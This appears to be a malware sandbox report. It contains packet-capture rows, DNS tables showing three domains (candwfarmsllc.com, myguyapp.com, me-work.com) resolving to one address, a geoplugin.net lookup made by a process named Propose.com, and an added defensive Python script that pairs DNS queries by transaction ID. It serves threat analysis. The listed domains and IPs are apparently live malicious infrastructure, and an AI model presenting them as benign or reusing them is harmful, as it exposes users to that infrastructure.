Jan 11, 2025 22:53:07.935112000 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.935112000 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.979875088 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.979919910 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.979968071 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.979985952 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.980014086 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.980067015 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.983023882 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.983068943 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.983103037 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.983115911 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.983148098 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.983167887 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.017328024 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.017368078 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.017406940 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.017443895 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.017472029 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.017505884 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.017520905 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.017564058 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.017587900 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.017600060 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.017632008 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.017652035 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.017925978 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.017966032 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.018003941 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.018014908 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.018043041 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.018059969 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.018287897 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.018327951 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.018362999 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.018374920 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.018403053 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.018419981 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.018721104 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.018759966 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.018788099 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.018800974 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.018827915 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.018847942 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.018969059 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.019007921 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.019043922 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.019056082 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:08.019093990 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:08.019114971 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.066508055 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.066550970 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.066591978 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.066610098 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.066637039 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.066679001 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.069855928 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.069899082 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.069926977 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.069941998 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.069978952 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.069978952 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.104206085 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.104260921 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.104314089 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.104343891 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.104368925 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.104399920 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.104450941 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.104465961 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.104484081 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.104515076 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.104552984 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.104855061 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.104895115 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.104931116 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.104948997 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.104974031 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.104991913 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.105134964 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.105175972 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.105196953 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.105209112 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.105237007 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.105281115 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.105717897 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.105768919 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.105812073 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.105824947 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.105851889 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.105906010 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.105931997 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.105973959 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.105999947 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.106012106 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.106041908 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.106057882 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.153779030 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.153832912 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.153862000 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.153881073 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.153909922 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.153928041 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.156692982 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.156735897 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.156764030 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.156775951 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.156806946 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.156826973 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.190942049 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.190987110 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.191034079 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.191047907 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.191076040 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.191097021 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.191276073 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.191335917 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.191346884 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.191366911 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.191405058 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.191426992 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.191693068 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.191732883 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.191776037 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.191788912 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.191817999 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.191968918 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192017078 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192039967 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192054033 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192085028 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192111015 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192249060 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192292929 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192320108 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192332029 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192359924 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192377090 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192594051 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192636967 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192668915 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192682028 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.192715883 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.192733049 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.240932941 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.240973949 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.241034985 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.241049051 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.241075993 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.241187096 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.244821072 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.244863033 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.244894981 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.244908094 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.244934082 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.244952917 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278016090 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278063059 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278093100 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278109074 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278137922 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278156042 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278482914 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278553009 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278559923 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278587103 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278624058 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278645039 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278848886 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278887033 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278914928 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278927088 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.278955936 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.278975010 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279051065 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279104948 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279133081 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279145956 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279172897 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279191971 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279376984 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279417992 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279443979 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279455900 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279496908 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279496908 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279865026 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279907942 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.279942036 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.279979944 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.487370968 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.487464905 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.521754026 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.521802902 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.521831036 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.521876097 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.521899939 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.521930933 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.521943092 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.521976948 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.521990061 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522020102 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522044897 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522056103 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522104025 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522115946 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522157907 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522170067 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522217989 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522244930 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522258043 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522300005 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522316933 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522365093 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522373915 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522388935 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522412062 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522444963 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522454023 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522499084 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522517920 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522532940 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522563934 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522567987 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522610903 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522630930 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522644043 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522669077 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522674084 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522712946 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:08.522732019 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:08.522746086 CET44349737193.26.115.39192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 22:52:58.293682098 CET | 192.168.2.4 | 1.1.1.1 | 0x28d | Standard query (0) | candwfarmsllc.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:53:00.661736965 CET | 192.168.2.4 | 1.1.1.1 | 0xf12 | Standard query (0) | myguyapp.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:53:11.886923075 CET | 192.168.2.4 | 1.1.1.1 | 0x6cf2 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:53:40.679752111 CET | 192.168.2.4 | 1.1.1.1 | 0x6694 | Standard query (0) | ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:54:07.160412073 CET | 192.168.2.4 | 1.1.1.1 | 0xbc1d | Standard query (0) | me-work.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:54:08.255458117 CET | 192.168.2.4 | 1.1.1.1 | 0x33a2 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:54:20.493724108 CET | 192.168.2.4 | 1.1.1.1 | 0x3cd2 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:54:44.572139025 CET | 192.168.2.4 | 1.1.1.1 | 0x1d23 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 22:52:58.300842047 CET | 1.1.1.1 | 192.168.2.4 | 0x28d | No error (0) | candwfarmsllc.com |  | 193.26.115.39 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:53:00.698678970 CET | 1.1.1.1 | 192.168.2.4 | 0xf12 | No error (0) | myguyapp.com |  | 193.26.115.39 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:53:11.894171000 CET | 1.1.1.1 | 192.168.2.4 | 0x6cf2 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 22:53:40.688468933 CET | 1.1.1.1 | 192.168.2.4 | 0x6694 | Name error (3) | ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:54:07.172962904 CET | 1.1.1.1 | 192.168.2.4 | 0xbc1d | No error (0) | me-work.com |  | 193.26.115.39 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:54:08.262870073 CET | 1.1.1.1 | 192.168.2.4 | 0x33a2 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:54:20.500967026 CET | 1.1.1.1 | 192.168.2.4 | 0x3cd2 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 22:54:44.580970049 CET | 1.1.1.1 | 192.168.2.4 | 0x1d23 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
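The report lists queries and answers as two separate tables, so two facts a responder wants are easy to miss: the three operator-controlled names (candwfarmsllc.com, myguyapp.com, me-work.com) all resolve to the same address, and one query for a long random-looking name came back NXDOMAIN. The script below is an added example, not part of the Joe Sandbox report: it pairs each query with its answer by transaction id and name, groups resolved names by address, and lists NXDOMAIN and unanswered queries separately. The records are transcribed from the two tables above; nothing else is assumed.

```python
"""Pair the report's DNS queries with their answers and pivot on the
addresses they resolve to.  Added example, not part of the Joe Sandbox
report; the records below are transcribed from the report's DNS tables."""
from collections import defaultdict, namedtuple

# (transaction id, name, reply code, record type, record data)
Answer = namedtuple("Answer", "txid name rcode rtype rdata")

QUERIES = [
    (0x28d, "candwfarmsllc.com"),
    (0xf12, "myguyapp.com"),
    (0x6cf2, "x1.i.lencr.org"),
    (0x6694, "ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF"),
    (0xbc1d, "me-work.com"),
    (0x33a2, "geoplugin.net"),
    (0x3cd2, "geoplugin.net"),
    (0x1d23, "geoplugin.net"),
]

ANSWERS = [
    Answer(0x28d, "candwfarmsllc.com", 0, "A", "193.26.115.39"),
    Answer(0xf12, "myguyapp.com", 0, "A", "193.26.115.39"),
    Answer(0x6cf2, "x1.i.lencr.org", 0, "CNAME", "crl.root-x1.letsencrypt.org.edgekey.net"),
    Answer(0x6694, "ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF", 3, None, None),
    Answer(0xbc1d, "me-work.com", 0, "A", "193.26.115.39"),
    Answer(0x33a2, "geoplugin.net", 0, "A", "178.237.33.50"),
    Answer(0x3cd2, "geoplugin.net", 0, "A", "178.237.33.50"),
    Answer(0x1d23, "geoplugin.net", 0, "A", "178.237.33.50"),
]


def pair(queries, answers):
    """Match queries to answers by transaction id *and* name: ids are only
    16 bits and repeat over a long capture.  Returns (paired, unanswered)."""
    by_key = {(a.txid, a.name): a for a in answers}
    paired, unanswered = [], []
    for txid, name in queries:
        a = by_key.get((txid, name))
        if a is None:
            unanswered.append(name)
        else:
            paired.append((name, a))
    return paired, unanswered


def pivot_by_ip(answers):
    """Queried names grouped by the address they resolved to; several
    unrelated-looking domains on one IP usually means one operator."""
    hosts = defaultdict(set)
    for a in answers:
        if a.rcode == 0 and a.rtype == "A":
            hosts[a.rdata].add(a.name)
    return {ip: sorted(names) for ip, names in hosts.items()}


def nxdomain_names(answers):
    """Names the resolver said do not exist (reply code 3)."""
    return sorted({a.name for a in answers if a.rcode == 3})


def summarize(queries, answers):
    """One line per address, then the NXDOMAIN and unanswered names."""
    lines = []
    _, unanswered = pair(queries, answers)
    for ip, names in sorted(pivot_by_ip(answers).items()):
        lines.append(f"{ip}: {', '.join(names)}")
    for name in nxdomain_names(answers):
        lines.append(f"NXDOMAIN: {name}")
    for name in unanswered:
        lines.append(f"no answer: {name}")
    return lines


if __name__ == "__main__":
    print("\n".join(summarize(QUERIES, ANSWERS)))
```

The same pivot works on a Zeek dns.log or a resolver's query log; the only report-specific part is the transcribed input.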
                                                                                      • candwfarmsllc.com
                                                                                      • myguyapp.com
                                                                                      • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49830 | 178.237.33.50 | 80 | 3272 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 22:54:08.274575949 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Jan 11, 2025 22:54:08.890670061 CET | 1171 | IN | HTTP/1.1 200 OK
                                                                                      date: Sat, 11 Jan 2025 21:54:08 GMT
                                                                                      server: Apache
                                                                                      content-length: 963
                                                                                      content-type: application/json; charset=utf-8
                                                                                      cache-control: public, max-age=300
                                                                                      access-control-allow-origin: *
